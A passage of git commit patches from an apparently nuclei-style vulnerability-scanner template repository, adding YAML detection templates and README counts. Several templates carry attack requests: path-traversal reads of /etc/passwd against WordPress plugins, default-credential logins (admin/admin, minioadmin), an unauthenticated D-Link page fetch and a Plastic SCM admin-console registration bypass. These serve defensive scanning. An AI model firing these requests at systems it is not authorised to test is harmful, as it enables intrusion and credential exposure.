gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + Content-Length: 136 - { - "type":"EXEC", - "mbean":"com.sun.management:type=HotSpotDiagnostic", - "operation":"dumpHeap", - "arguments":["/tmp1234/test1.hprof",0] - } + { + "type":"EXEC", + "mbean":"com.sun.management:type=HotSpotDiagnostic", + "operation":"dumpHeap", + "arguments":[ + "/tmp1234/test1.hprof", + 0 + ] + } matchers: - type: word From 36a4bbb3bf14c30aff6f3b296f8eb17200b8538c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 12:58:02 +0000 Subject: [PATCH 0222/4083] Auto Update README [Fri Jul 2 12:58:02 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 6e3257f7a1..19bdb51396 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 202 | exposed-panels | 177 | +| cves | 376 | vulnerabilities | 203 | exposed-panels | 177 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 72 | workflows | 32 | miscellaneous | 26 | -| default-logins | 33 | file | 42 | dns | 10 | +| default-logins | 34 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1395 files**. +**123 directories, 1403 files**. From e0d5207fe6e1252a16a7247bd306a4ef998eff02 Mon Sep 17 00:00:00 2001 From: G4L1T0 Date: Fri, 2 Jul 2021 11:10:29 -0300 Subject: [PATCH 0223/4083] Add missing-x-content-type-options --- .../missing-x-content-type-options.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 miscellaneous/missing-x-content-type-options.yaml diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml new file mode 100644 index 0000000000..008872b06b --- /dev/null +++ b/miscellaneous/missing-x-content-type-options.yaml @@ -0,0 +1,18 @@ +id: missing-x-content-type-options + +info: + name: X-Content-Type-Options unidentified + author: G4L1T0 and @convisoappsec + severity: info + description: Check for X-Content-Type-Options header + tags: misc + +requests: + - method: GET + path: + - '{{BaseURL}}' + redirects: true + matchers: + - type: dsl + dsl: + - '!contains(tolower(all_headers), ''x-content-type-options'')' From 31a10ebfb793f81bf7894c8c45e18570610f0527 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 20:50:15 +0530 Subject: [PATCH 0224/4083] Update jetty-showcontexts-enable.yaml --- misconfiguration/jetty-showcontexts-enable.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/jetty-showcontexts-enable.yaml b/misconfiguration/jetty-showcontexts-enable.yaml index 8616aab012..08c705bc9b 100644 --- a/misconfiguration/jetty-showcontexts-enable.yaml +++ b/misconfiguration/jetty-showcontexts-enable.yaml @@ -4,6 +4,7 @@ info: name: Jetty showContexts Enable in DefaultHandler author: dhiyaneshDK severity: low + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml tags: jetty requests: From 532bf58f3d90399625a7e1b51092d2438a1221bd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 20:52:09 +0530 Subject: [PATCH 0225/4083] Update jboss-seam-debug-page.yaml --- exposures/logs/jboss-seam-debug-page.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/jboss-seam-debug-page.yaml b/exposures/logs/jboss-seam-debug-page.yaml index da47db57cc..e3493c0ad3 100644 --- a/exposures/logs/jboss-seam-debug-page.yaml +++ b/exposures/logs/jboss-seam-debug-page.yaml @@ -4,6 +4,7 @@ info: name: Jboss Seam Debug Page Enabled author: dhiyaneshDK severity: medium + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml tags: logs,exposure requests: From e259c3dd2f6e43aa3fa0244b35534f3aee3680c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 20:53:02 +0530 Subject: [PATCH 0226/4083] Update jfrog-unauth-build-exposed.yaml --- vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index bda35c4118..7c0533e52b 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -4,6 +4,7 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium + referemce: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog requests: From 127673455a56ad18991246c6f55991c11a48a307 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 20:55:33 +0530 Subject: [PATCH 0227/4083] Update coldfusion-debug-xss.yaml --- vulnerabilities/other/coldfusion-debug-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 3d7442c252..60e73bbb52 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -4,6 +4,7 @@ info: name: Adobe ColdFusion Debug Page XSS author: dhiyaneshDK severity: medium + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml tags: adobe,xss requests: From c80a15dffc8c8b2ec5e3c651180d3eef823fea24 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 00:16:36 +0530 Subject: [PATCH 0228/4083] added grails-database-admin-console --- .../grails-database-admin-console.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposed-panels/grails-database-admin-console.yaml diff --git a/exposed-panels/grails-database-admin-console.yaml b/exposed-panels/grails-database-admin-console.yaml new file mode 100644 index 0000000000..f2ed34b32f --- /dev/null +++ b/exposed-panels/grails-database-admin-console.yaml @@ -0,0 +1,19 @@ +id: grails-database-admin-console + +info: + name: Grails database admin console + author: emadshanab + severity: medium + tags: grails,panel + reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/ + +requests: + - method: GET + path: + - '{{BaseURL}}/dbconsole/' + - '{{BaseURL}}/h2-console/' + + matchers: + - type: word + words: + - "H2 Console" From d7a0b1259f7a19f72b23e72c1b313effc667e814 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 18:48:12 +0000 Subject: [PATCH 0229/4083] Auto Update README [Fri Jul 2 18:48:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 19bdb51396..c5c43bbb53 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 376 | vulnerabilities | 203 | exposed-panels | 177 | +| cves | 376 | vulnerabilities | 203 | exposed-panels | 178 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 72 | workflows | 32 | miscellaneous | 26 | | default-logins | 34 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**123 directories, 1403 files**. +**123 directories, 1404 files**. From e20298b4d3a347395494191ddc06e1599422caf9 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Sat, 3 Jul 2021 05:50:40 +0530 Subject: [PATCH 0230/4083] D-Link DIR-600M Router - Authentication Bypass --- cves/2019/CVE-2019-13101.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2019/CVE-2019-13101.yaml diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml new file mode 100644 index 0000000000..bc76bfa5a6 --- /dev/null +++ b/cves/2019/CVE-2019-13101.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-13101 + +info: + author: Suman_Kar + name: D-Link DIR-600M - Authentication Bypass + description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06. + severity: critical + tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router + +requests: + - raw: + - | + GET /wlan_basic.htm HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + + matchers: + - type: status + status: + - 200 \ No newline at end of file From dcc29c608b58ad740742a4a54d652040a18acc98 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 3 Jul 2021 18:47:19 +0900 Subject: [PATCH 0231/4083] Create CVE-2019-9618.yaml --- CVE-2019-9618.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 CVE-2019-9618.yaml diff --git a/CVE-2019-9618.yaml b/CVE-2019-9618.yaml new file mode 100644 index 0000000000..a0f12ed444 --- /dev/null +++ b/CVE-2019-9618.yaml @@ -0,0 +1,23 @@ +id: cve-2019-9618 +info: + name: GraceMedia Media Player 1.0 - Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/46537 + tags: wp,cves,wordpress,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 9f3de394346e4057ea5082927dfa245d39ff6256 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 3 Jul 2021 18:51:16 +0900 Subject: [PATCH 0232/4083] Create wp-vault-lfi.yaml --- wp-vault-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 wp-vault-lfi.yaml diff --git a/wp-vault-lfi.yaml b/wp-vault-lfi.yaml new file mode 100644 index 0000000000..94fd340260 --- /dev/null +++ b/wp-vault-lfi.yaml @@ -0,0 +1,24 @@ +id: wp-vault-local-file-inclusion + +info: + name: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/40850 + tags: wp,wordpress,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From f21b23985364508a27ad5fa14476fbf4c2c334cd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 15:23:28 +0530 Subject: [PATCH 0233/4083] misc changes --- CVE-2019-9618.yaml => cves/2020/CVE-2019-9618.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) rename CVE-2019-9618.yaml => cves/2020/CVE-2019-9618.yaml (66%) diff --git a/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml similarity index 66% rename from CVE-2019-9618.yaml rename to cves/2020/CVE-2019-9618.yaml index a0f12ed444..bc0a6e0e6d 100644 --- a/CVE-2019-9618.yaml +++ b/cves/2020/CVE-2019-9618.yaml @@ -1,10 +1,13 @@ -id: cve-2019-9618 +id: CVE-2019-9618 + info: name: GraceMedia Media Player 1.0 - Local File Inclusion author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/46537 - tags: wp,cves,wordpress,lfi + severity: critical + reference: | + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 + tags: cve,cve2019,wordpress,wp-plugin,lfi requests: - method: GET @@ -20,4 +23,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 5d7388f0ae34e4b3d03e0b61ca064ff54c11cbd8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 16:37:11 +0530 Subject: [PATCH 0234/4083] Added Unauthorized Access to Plastic Admin Console --- .../unauthorized-plastic-scm.yaml | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 misconfiguration/unauthorized-plastic-scm.yaml diff --git a/misconfiguration/unauthorized-plastic-scm.yaml b/misconfiguration/unauthorized-plastic-scm.yaml new file mode 100644 index 0000000000..9e90779e14 --- /dev/null +++ b/misconfiguration/unauthorized-plastic-scm.yaml @@ -0,0 +1,51 @@ +id: unauthorized-plastic-scm + +info: + name: Unauthorized Access to Plastic Admin Console + author: DEENA + severity: critical + tags: plastic + reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 + + +requests: + - raw: + - | + GET /account/register HTTP/1.1 + {{Hostname}} + + - | + POST /account/register HTTP/1.1 + Host: {{Hostname}} + Origin: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/account/register + Connection: close + + Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false + + - | + GET /configuration HTTP/1.1 + {{Hostname}} + + cookie-reuse: true + extractors: + - type: regex + part: body + internal: true + group: 1 + name: csrf + regex: + - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' + + matchers-condition: and + matchers: + - type: word + words: + - "Network - Plastic SCM" + part: body + + - type: status + status: + - 200 + From a5f817501719c67c5452ba54937e258f8fd70fd4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 16:39:59 +0530 Subject: [PATCH 0235/4083] Update unauthorized-plastic-scm.yaml --- misconfiguration/unauthorized-plastic-scm.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/misconfiguration/unauthorized-plastic-scm.yaml b/misconfiguration/unauthorized-plastic-scm.yaml index 9e90779e14..6678abb0c6 100644 --- a/misconfiguration/unauthorized-plastic-scm.yaml +++ b/misconfiguration/unauthorized-plastic-scm.yaml @@ -7,7 +7,6 @@ info: tags: plastic reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 - requests: - raw: - | @@ -48,4 +47,3 @@ requests: - type: status status: - 200 - From f1504d51214ffb2e6f2b983bb75eb0925a243906 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Jul 2021 11:14:27 +0000 Subject: [PATCH 0236/4083] Auto Update README [Sat Jul 3 11:14:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c5c43bbb53..759fd0b342 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 376 | vulnerabilities | 203 | exposed-panels | 178 | | takeovers | 69 | exposures | 107 | technologies | 108 | -| misconfiguration | 72 | workflows | 32 | miscellaneous | 26 | +| misconfiguration | 73 | workflows | 32 | miscellaneous | 26 | | default-logins | 34 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**123 directories, 1404 files**. +**123 directories, 1405 files**. From dc7c40312933e2f1d4e21581b6e96ee2d836dc4a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 3 Jul 2021 18:57:51 +0700 Subject: [PATCH 0237/4083] Create wifisky-default-password.yaml --- .../wifisky/wifisky-default-password.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/wifisky/wifisky-default-password.yaml diff --git a/default-logins/wifisky/wifisky-default-password.yaml b/default-logins/wifisky/wifisky-default-password.yaml new file mode 100644 index 0000000000..e005b5cc95 --- /dev/null +++ b/default-logins/wifisky/wifisky-default-password.yaml @@ -0,0 +1,31 @@ +id: wifisky-default-password + +info: + name: Wifisky Default Password + author: pikpikcu + severity: high + +requests: + - method: POST + path: + - "{{BaseURL}}/login.php?action=login&type=admin" + body: | + username=admin&password=admin + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: word + words: + - '"success":' + part: body + condition: and + + - type: status + status: + - 200 From 6e0a31fda9366c32cf4cd300c45a11eff201e655 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 3 Jul 2021 19:08:07 +0700 Subject: [PATCH 0238/4083] Create minio-default-password.yaml --- .../minio/minio-default-password.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/minio/minio-default-password.yaml diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml new file mode 100644 index 0000000000..943e78d573 --- /dev/null +++ b/default-logins/minio/minio-default-password.yaml @@ -0,0 +1,34 @@ +id: minio-default-password + +info: + name: Minio Default Password + author: pikpikcu + severity: medium + +requests: + - method: POST + path: + - "{{BaseURL}}/minio/webrpc" + headers: + Content-Type: application/json + body: | + {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + + - type: word + words: + - 'uiVersion' + - 'token' + part: body + condition: and + + - type: status + status: + - 200 From e1c2053210a8155b259bfe71e5d57523c783e817 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 3 Jul 2021 19:10:10 +0700 Subject: [PATCH 0239/4083] Update minio-default-password.yaml --- default-logins/minio/minio-default-password.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 943e78d573..181a313002 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml @@ -9,7 +9,7 @@ requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" - headers: + headers: Content-Type: application/json body: | {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} From f249af535aff7cc8c215e607e88db8db09164e2b Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Sat, 3 Jul 2021 17:55:11 +0530 Subject: [PATCH 0240/4083] Update CVE-2019-13101.yaml iot tag added --- cves/2019/CVE-2019-13101.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index bc76bfa5a6..d7ef8e8ab1 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -5,7 +5,7 @@ info: name: D-Link DIR-600M - Authentication Bypass description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06. severity: critical - tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router + tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router,iot requests: - raw: @@ -19,4 +19,4 @@ requests: matchers: - type: status status: - - 200 \ No newline at end of file + - 200 From 08e5e5e891645592691522d7b443e94be92c774e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 17:59:27 +0530 Subject: [PATCH 0241/4083] minor update --- .../wifisky/wifisky-default-password.yaml | 22 ++++++++++++------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/default-logins/wifisky/wifisky-default-password.yaml b/default-logins/wifisky/wifisky-default-password.yaml index e005b5cc95..518079ea98 100644 --- a/default-logins/wifisky/wifisky-default-password.yaml +++ b/default-logins/wifisky/wifisky-default-password.yaml @@ -6,26 +6,32 @@ info: severity: high requests: - - method: POST - path: - - "{{BaseURL}}/login.php?action=login&type=admin" - body: | - username=admin&password=admin + - raw: + - | + POST /login.php?action=login&type=admin HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + username=admin&password=admin matchers-condition: and matchers: - type: word words: - - "Content-Type: text/html" + - "text/html" part: header - type: word words: - - '"success":' + - '"success":"true"' + - '"data":' part: body condition: and - type: status status: - - 200 + - 200 \ No newline at end of file From 73d6ee890249eab48e9881fd822cb6631b490dcc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 18:01:31 +0530 Subject: [PATCH 0242/4083] Update wifisky-default-password.yaml --- default-logins/wifisky/wifisky-default-password.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/wifisky/wifisky-default-password.yaml b/default-logins/wifisky/wifisky-default-password.yaml index 518079ea98..ece1a116da 100644 --- a/default-logins/wifisky/wifisky-default-password.yaml +++ b/default-logins/wifisky/wifisky-default-password.yaml @@ -4,6 +4,7 @@ info: name: Wifisky Default Password author: pikpikcu severity: high + tags: default-login,wifisky requests: - raw: From 8f19732d8bd61614f0d41e839a2929b0d05005e0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Jul 2021 12:32:22 +0000 Subject: [PATCH 0243/4083] Auto Update README [Sat Jul 3 12:32:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 759fd0b342..ddbfc4fde3 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 376 | vulnerabilities | 203 | exposed-panels | 178 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 73 | workflows | 32 | miscellaneous | 26 | -| default-logins | 34 | file | 42 | dns | 10 | +| default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**123 directories, 1405 files**. +**124 directories, 1406 files**. From 9371f5a94062ac8e3983824f8662b723565fe108 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 3 Jul 2021 19:43:44 +0700 Subject: [PATCH 0244/4083] Create zentao-detect.yaml --- exposed-panels/zentao-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/zentao-detect.yaml diff --git a/exposed-panels/zentao-detect.yaml b/exposed-panels/zentao-detect.yaml new file mode 100644 index 0000000000..9d462c0d59 --- /dev/null +++ b/exposed-panels/zentao-detect.yaml @@ -0,0 +1,24 @@ +id: zentao-detect + +info: + name: Zentao detect + author: pikpikcu + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/zentao/index.php?mode=getconfig" + matchers: + - type: word + words: + - '"sessionName":"zentaosid"' + part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version":"([v0-9.]+)"' From 4d082d08c2fddf404248c7b3a89d13d8c2fd891f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 3 Jul 2021 19:52:00 +0700 Subject: [PATCH 0245/4083] Create minio-detect.yaml --- exposed-panels/minio-detect.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposed-panels/minio-detect.yaml diff --git a/exposed-panels/minio-detect.yaml b/exposed-panels/minio-detect.yaml new file mode 100644 index 0000000000..3e40bb74cf --- /dev/null +++ b/exposed-panels/minio-detect.yaml @@ -0,0 +1,17 @@ +id: minio-detect + +info: + name: Minio panel detect + author: pikpikcu + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/minio/login" + matchers: + - type: word + words: + - "MinIO Browser" + part: body From 9e9954cbab9d4dbfb6f03efb7e311312c285bc74 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 4 Jul 2021 00:07:30 +0530 Subject: [PATCH 0246/4083] strict matchers --- cves/2019/CVE-2019-13101.yaml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index d7ef8e8ab1..150417e88d 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -3,20 +3,30 @@ id: CVE-2019-13101 info: author: Suman_Kar name: D-Link DIR-600M - Authentication Bypass - description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06. + description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. severity: critical - tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router,iot + tags: cve,cve2019,dlink,router,iot + referecne: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 + - https://github.com/d0x0/D-Link-DIR-600M + - https://www.exploit-db.com/exploits/47250 requests: - raw: - | - GET /wlan_basic.htm HTTP/1.1 + GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: status status: - 200 + + - type: word + words: + - "/PPPoE/" + part: body \ No newline at end of file From acebe227a12e31995d8dae2bfedb6db1054abb02 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 4 Jul 2021 00:12:01 +0530 Subject: [PATCH 0247/4083] Update CVE-2019-13101.yaml --- cves/2019/CVE-2019-13101.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 150417e88d..ec1c8e810a 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -6,7 +6,7 @@ info: description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. severity: critical tags: cve,cve2019,dlink,router,iot - referecne: | + reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 From a08d6ca4cf2e3c42eb05f969756929604e649442 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Jul 2021 18:43:38 +0000 Subject: [PATCH 0248/4083] Auto Update README [Sat Jul 3 18:43:38 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ddbfc4fde3..dcad5095d5 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 376 | vulnerabilities | 203 | exposed-panels | 178 | +| cves | 377 | vulnerabilities | 203 | exposed-panels | 178 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 73 | workflows | 32 | miscellaneous | 26 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1406 files**. +**124 directories, 1407 files**. From b137eb57d3d14f3809c25638948a0b7ad657d426 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 00:41:57 +0530 Subject: [PATCH 0249/4083] More edge cases Only looking for DNS interaction is not reliable as few servers make DNS requests for host included in path or query parameter. --- cves/2015/CVE-2015-8813.yaml | 4 ++-- cves/2017/CVE-2017-3506.yaml | 4 ++-- cves/2017/CVE-2017-9506.yaml | 2 +- cves/2019/CVE-2019-2616.yaml | 4 ++-- cves/2019/CVE-2019-2767.yaml | 4 ++-- vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml | 4 ++-- 6 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 0d085c296d..b8ac27b189 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -17,6 +17,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" \ No newline at end of file + - "http" \ No newline at end of file diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 7ccc09a393..b177e57c20 100644 --- 